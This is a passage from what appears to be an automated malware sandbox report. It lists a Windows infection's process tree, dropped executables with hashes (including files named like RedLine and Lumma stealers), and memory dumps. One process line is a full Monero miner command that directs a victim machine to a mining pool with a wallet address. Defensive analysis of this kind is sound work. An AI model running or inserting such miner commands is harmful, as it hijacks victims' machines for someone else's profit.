C:\Users\Admin\Pictures\ZJnrTXYzz7e19UKQLyFEb3T5.exe
"C:\Users\Admin\Pictures\ZJnrTXYzz7e19UKQLyFEb3T5.exe"
8⤵
PID:6056

C:\Users\Admin\Pictures\bp6wgkrVk7DeKlI4zIAoP8tZ.exe
"C:\Users\Admin\Pictures\bp6wgkrVk7DeKlI4zIAoP8tZ.exe"
8⤵
PID:5284

C:\Users\Admin\Pictures\Huo6JAvFZ3vNQg9IytbRxSpN.exe
"C:\Users\Admin\Pictures\Huo6JAvFZ3vNQg9IytbRxSpN.exe"
8⤵
PID:5740

C:\Users\Admin\Pictures\ZfgtA9MyqZJdjBGVmleKlSu4.exe
"C:\Users\Admin\Pictures\ZfgtA9MyqZJdjBGVmleKlSu4.exe"
8⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
5⤵
PID:5980

C:\Users\Admin\1000006002\8d14837a3f.exe
"C:\Users\Admin\1000006002\8d14837a3f.exe"
3⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3504 -ip 3504
1⤵
PID:1568

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:4900

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
2⤵
PID:1560

C:\Windows\Temp\437148.exe
"C:\Windows\Temp\437148.exe" --list-devices
3⤵
PID:4972

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:4392

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
2⤵
PID:4968

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:4456

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
2⤵
PID:2908

C:\Windows\Temp\427363.exe
"C:\Windows\Temp\427363.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
3⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1172 -ip 1172
1⤵
PID:2888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1172 -ip 1172
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4564 -ip 4564
1⤵
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1172 -ip 1172
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1172 -ip 1172
1⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1172 -ip 1172
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1172 -ip 1172
1⤵
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1172 -ip 1172
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1172 -ip 1172
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1172 -ip 1172
1⤵
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1172 -ip 1172
1⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:5276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6080

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe
Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installc.bat
Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat
Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat
Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Users\Admin\1000006002\8d14837a3f.exe
Filesize
2.2MB

MD5
8b46d0427f7e478b4a531c22ff635f13

SHA1
53bed75df173b0744c8998983a1d161278fb06e4

SHA256
71db1c8fd3ecfe967bdd875f289949533083ffca5d25717311867749bf538792

SHA512
4c4f73144502b2443bf9d20894ea09e8ad664020d48904ceaca0b07334371355f24709e084237aa1c68f43d9b63bf6a53d92e1d7455614378dddbc29e6205234

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
Filesize
830B

MD5
a483da8b27289fc9cc49d6b17e61cbf6

SHA1
2d4a5a704c2ff332df6436b7bcd16365f03c2a97

SHA256
f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

SHA512
e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
Filesize
2.1MB

MD5
9a8fc1898e79195b89a0c5a4273b9d3f

SHA1
4bb12c6baa2ef69234d3ee6eb26965fd78944e81

SHA256
f746f32dcc82c31c4c3e83fc73d84cf420feb14f282fb36ddcf85a070d3a731c

SHA512
0e11ef25fd1456338d8ea938e73687cf2441ffb78d8b520dccdd7167397bff7a5c85a39373788361ce1209be592c294ea34d0ac12cfddcb3c498f31bb2a8f9e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
Filesize
1.9MB

MD5
b688e350af7a7543d1c9351730d49176

SHA1
5d270925f1e1367b83cf9701f96f6c8a2d0e5391

SHA256
dbe0c9317110504f0bfb091e772a7cd5b20c9f26dfc1d434ed072567c42b1271

SHA512
0266bf4d7ecc643e46117c165e38d9b01f6f6ecd198411b6f291ef664096f21f101127e431443f2a30443912c4f3a10cbb77ef3522b849eb82ed8e9fea16a656

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
Filesize
402KB

MD5
7f981db325bfed412599b12604bd00ab

SHA1
9f8a8fd9df3af3a4111e429b639174229c0c10cd

SHA256
043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

SHA512
a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
Filesize
1.8MB

MD5
8c2ad888796dd437e88eaec086475531

SHA1
f93a9948c83c4ddfe87279dd7fa167dee5baae07

SHA256
dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

SHA512
ba5371bea752a6659b3af866b28f757b3f744d6bd597085428dd7a41f3b649edf49eaeb0375174d81a78613f4293be1cd6c68924f196c3464c20b634f1ec9346

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
Filesize
304KB

MD5
9faf597de46ed64912a01491fe550d33

SHA1
49203277926355afd49393782ae4e01802ad48af

SHA256
0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

SHA512
ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
Filesize
1.0MB

MD5
808c0214e53b576530ee5b4592793bb0

SHA1
3fb03784f5dab1e99d5453664bd3169eff495c97

SHA256
434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

SHA512
2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
Filesize
1.2MB

MD5
56e7d98642cfc9ec438b59022c2d58d7

SHA1
26526f702e584d8c8b629b2db5d282c2125665d7

SHA256
a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

SHA512
0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
Filesize
1.2MB

MD5
3fb780dc27cfcb019c66bc52e996f279

SHA1
830f6d41dee2b6d8da6e3105ead0df235751d081

SHA256
9c036b4b75df73b10fd43f4827d96777adb3e982bbcb297ffc64ef7ee9622592

SHA512
cf259c47d688cdcbbe0ce5df3742779dea6ca81875249d02f64c5eb5a5d8f45e3e809969f43f3d2aa39e988578408f2007b0c696805e5ac948355e4cb2eb7421

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe
Filesize
621KB

MD5
611a4246c5aabf1594344d7bd3fccb4c

SHA1
cf0e6b3ecb479a8bdb7421090ecc89148db9f83b

SHA256
aa34e0bb1a7400fd7430922307c36441290730d07f48f982f01d4bad2fde3d0e

SHA512
0daff7de219bcc38ddc8ddf261993b6e870605fbf6ec194e08651b293008a8a42c0c13780482f7fc45e3a5f509b644430311cb382be632075544e61dc63fe23e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
Filesize
749KB

MD5
ec071dde7d9bec968e6765d245824a66

SHA1
06f82c9e241ba768a43009925a5b081f8f955932

SHA256
21aaa33d1cd4d9f0de4f60a35c4694ba926e7e01118a8c14b2fd8856a71774c9

SHA512
cd87e5a07480c84ef9cf3dfd5feeb81506d1ecce49b17c6587cb3163ab2d9d3cc8ac1ebfbbb5b08cef7a74f07ead2bb6fa1bccb290fe1b31ce7dd8d1751325e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
Filesize
284KB

MD5
88040498559fef74d0d1fb54ff46589b

SHA1
77fef4af7246d72dd7a4c7c51c65ad6fd92f577b

SHA256
76ddb4ce3f5cd5acfb557992f5265860300bf0413420ad2cae09a003209ce797

SHA512
f7a9536a86e0f6700804450e1bcdb205aad669815453c2d30496b14401a10d6f973388ea29c13de4298b317d57321254e19ca3fbc4a779142070cfdaa27f2840

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
Filesize
225KB

MD5
4daa25326ccb9300ab571c6ccd64fc50

SHA1
411b341bbf7116896d9cf95ca2c9dc24546f150f

SHA256
dcf2b2270505e9fa0caa26a2eff9e2de8a3cf95f0fe479e07332a0f22777525e

SHA512
26a4dfefcf098e7b0f2139bc0d950c28d7be1513f336249dfc849696c888ce0fe69b66c608646f2953500c069a85db69634100a1d6d576da4e66ae4855763216

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
Filesize
4.1MB

MD5
1c14de5694634f70dceca25d38992b6b

SHA1
c78f313d1b66de3f9bfe3e48bbb018cfad2d8d6e

SHA256
b938a456f1950319ed9a816e85ccf8ec462fd30b76afab0088b29b7c85e05e15

SHA512
59e47301765a3d1d0809af2ab9b8cb3b9068949d68d9c5f88b8e1c87e8245c6ef794ef6c84e8cd7f30d77df40b47c1ceb1b04fe6c5dccbce0a17463ebadd81b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
Filesize
1.7MB

MD5
7436868f4ea3111d204d5f5eea08eec5

SHA1
1ffba75eec05fed9564966eeca1cfcb6c5751774

SHA256
0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447

SHA512
04397d86398d7582c07172b38193a97cf4454a660c4af999b9347e23561e2648c36eb3ac98ce948f1239159709cfec991780ab45e88fe48d8e3dc7e36a1ee939

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp7A31.tmp
Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fmvqfcph.31m.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3938118698-2964058152-2337880935-1000\76b53b3ec448f7ccdda2063b15d2bfc3_02e43ba0-d8d9-445c-a4dc-44173833e050
Filesize
2KB

MD5
8f5a4bb5d6d3bfb20a2e36a328f4b557

SHA1
44a41e07fdcb0a0a391b8682c9755e9484ad3a57

SHA256
952fd7cfa4341b426d63ace24e444b4c4b962b2c73734ba533ec6f5745acaae7

SHA512
3b28c444c7fd2bee2db078fd3b8b29af0911a8854ab99b773b8a528af20e321bbab42cc4ca53e9078e50e3e54b65bbcd1ebffa049a91671bf0cacbde705ff668

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
Filesize
304KB

MD5
0c582da789c91878ab2f1b12d7461496

SHA1
238bd2408f484dd13113889792d6e46d6b41c5ba

SHA256
a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67

SHA512
a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
Filesize
750KB

MD5
20ae0bb07ba77cb3748aa63b6eb51afb

SHA1
87c468dc8f3d90a63833d36e4c900fa88d505c6d

SHA256
daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d

SHA512
db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
Filesize
2KB

MD5
d6052557ad266c1fe03a2d52cf80047f

SHA1
221b367c01d08390b04da0b998fba91ddae4bf95

SHA256
fc2fc5b67367f939b5a5217e47f63ad75ac1c75d9b5d8b7e2c33b5bbf12ad113

SHA512
5d1ca83fa6b55f629f5753328948a75ac6f076158aeb7162e98299c5d28f674708f93b19f3bac25123d36c8714ca6f56006fac5895147e3aee761b7b9c4079ed

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
Filesize
2KB

MD5
c00f60571509ed2e9d411e944233ee84

SHA1
38e99a70a156bd2f25a2727466f71d68783c30c6

SHA256
be196d2254a4ab2a05313e5c2ef365443c715ad6ae19060a19a7aa780defea69

SHA512
3a2a69aae1301ea9d82a1c357dccddc4bb652171ea3c7ee59ac613884e4e8ab3d71185cb3ebcb53afd06205e34ba04caac1838af69dd1b9ad9e12d67bc1f1d1d

Download Submit
C:\Users\Admin\Pictures\N3YrmUh5Ab7zF6CaFgJPUhG1.exe
Filesize
1.4MB

MD5
a820588766207bdd82ac79ff4f553b6f

SHA1
2e3985344dddfc9c88d5f5a22bdfa932259332d3

SHA256
0209678b3cb7b5d67d9a73fbdce851148909ecdba3b8766d5a59eca4cb848e05

SHA512
cc052c5021ec0f18e3b24701bdf9425ffdee67645eadab5f27f8dd073eb4711a824e77c83b39cb2d2a0de44733bd09504aba466120393bb63001c8d80aa76656

Download Submit
C:\Users\Admin\Pictures\Y65sslsieSOUgznpy9JrHpmv.exe
Filesize
4.1MB

MD5
7e7b80abf7f7fab19a6d839ca2b4ca0f

SHA1
fd5811eaf578af32f79b3a8feed59c07f75503fe

SHA256
9ad3d9f0a33670b6b0b44c89a9d6c6273dcba31010b5cdf29884afe1dd7a689f

SHA512
facc730c3dcc43f4d24dfccdf36ebac6afa3614073c654267655ef656848075bfb4166b4b410bc47b9a21a3f116d98a684beff03c480ba54861cbcb9bff26654

Download Submit
C:\Users\Admin\Pictures\ZfgtA9MyqZJdjBGVmleKlSu4.exe
Filesize
4.2MB

MD5
362697c95a1c9964af1ab23ddfc29b04

SHA1
64f71233a4e12a1eab40fc9501c4f8c4c9eacba4

SHA256
7298b43de9d8dc586ce35f452e67b98d234c2b005648ffb7e6a21bea06a8dcb9

SHA512
e100db0020c09ae6e4e8d08c2aca00a4ad4c9efffd01902c9fa502a17d43a86e842177d8191a06b6a996c1523c9d127fc34352721f726f46308af764a0404120

Download Submit
C:\Users\Admin\Pictures\a7A53h5W02gnPiMXbaLMuteR.exe
Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\bp6wgkrVk7DeKlI4zIAoP8tZ.exe
Filesize
4.1MB

MD5
c154b7ded500c319e8e2ba82a88ed039

SHA1
81aba39aab24b05e49219a254063c7d43b274c05

SHA256
41a88a05cc8224704ce64bceaec1b66a7e537176baf8d233f2091b29208246b8

SHA512
0397495c8a207bfd0ebcd6e464b1c53aed53f9078bd731304610f17df9c95468fedf41e1e4cb310a637b32b512e0d039ef6784d532e382d47acf71ed6b3a4816

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk
Filesize
2KB

MD5
4d821bd3edb67e363ddf9303277687a4

SHA1
3247d1c04bb058a7062accad5951cc28818b469a

SHA256
17ef6b6b0141e93a5de80b2abbcaf6e46d489ff4664dc126ed2f8d37c6259b5c

SHA512
0bdaf2a4b8e2a8e38c9de328fb7b030f9f9dc117220d5388d1feb14cd7066464459e01e8fa77de9d66611492117549408c2413a75eae28fc2334dbb2550d2166

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk
Filesize
2KB

MD5
045ba5322699c8b322305b29843e57a7

SHA1
713c46389cbd1b2f107cb185534023b20e8184e0

SHA256
8a373352ae9ae9cec4d159d031c6eae8ffa7323cc9528ae9eac2ce8961246d79

SHA512
ff4aa239f97924c6f6b34785f0ed626e8fe043fc8a29eb59fd6b5f6df637e022ebbb48490626a8e017fa9276829fb4244d3d85082bdbb21522cd1d1bd2a0836d

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini
Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\Temp\437148.exe
Filesize
2.0MB

MD5
5c9e996ee95437c15b8d312932e72529

SHA1
eb174c76a8759f4b85765fa24d751846f4a2d2ef

SHA256
0eecdbfabaaef36f497e944a6ceb468d01824f3ae6457b4ae4b3ac8e95eebb55

SHA512
935102aad64da7eeb3e4b172488b3a0395298d480f885ecedc5d8325f0a9eabeea8ba1ece512753ac170a03016c80ba4990786ab608b4de0b11e6343fbf2192b

Download Submit
C:\Windows\Temp\cudart64_101.dll
Filesize
398KB

MD5
1d7955354884a9058e89bb8ea34415c9

SHA1
62c046984afd51877ecadad1eca209fda74c8cb1

SHA256
111f216aef35f45086888c3f0a30bb9ab48e2b333daeddafd3a76be037a22a6e

SHA512
7eb8739841c476cda3cf4c8220998bc8c435c04a89c4bbef27b8f3b904762dede224552b4204d35935562aa73f258c4e0ddb69d065f732cb06cc357796cdd1b2

Download Submit
memory/872-329-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/872-327-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/1084-218-0x0000000006260000-0x00000000062AC000-memory.dmp

Filesize
304KB

Download
memory/1084-188-0x0000000004A60000-0x0000000004A6A000-memory.dmp

Filesize
40KB

Download
memory/1084-205-0x0000000004FA0000-0x0000000005016000-memory.dmp

Filesize
472KB

Download
memory/1084-183-0x0000000004AF0000-0x0000000004B82000-memory.dmp

Filesize
584KB

Download
memory/1084-208-0x0000000005D80000-0x0000000005D9E000-memory.dmp

Filesize
120KB

Download
memory/1084-215-0x0000000006150000-0x000000000625A000-memory.dmp

Filesize
1.0MB

Download
memory/1084-172-0x0000000000080000-0x00000000000D2000-memory.dmp

Filesize
328KB

Download
memory/1084-216-0x0000000006090000-0x00000000060A2000-memory.dmp

Filesize
72KB

Download
memory/1084-214-0x0000000006600000-0x0000000006C18000-memory.dmp

Filesize
6.1MB

Download
memory/1084-217-0x00000000060F0000-0x000000000612C000-memory.dmp

Filesize
240KB

Download
memory/1084-346-0x00000000063A0000-0x0000000006406000-memory.dmp

Filesize
408KB

Download
memory/1084-182-0x00000000050A0000-0x0000000005646000-memory.dmp

Filesize
5.6MB

Download
memory/1148-328-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/1744-212-0x0000000000F50000-0x0000000000F51000-memory.dmp

Filesize
4KB

Download
memory/1744-207-0x0000000000F50000-0x0000000000F51000-memory.dmp

Filesize
4KB

Download
memory/2360-7-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-2-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-21-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-8-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-1-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-3-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-0-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-5-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-4-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2360-6-0x0000000000DF0000-0x000000000133F000-memory.dmp

Filesize
5.3MB

Download
memory/2444-366-0x00000000012B0000-0x00000000012B1000-memory.dmp

Filesize
4KB

Download
memory/2848-129-0x000000001B990000-0x000000001B9B2000-memory.dmp

Filesize
136KB

Download
memory/2848-389-0x0000000020050000-0x0000000020203000-memory.dmp

Filesize
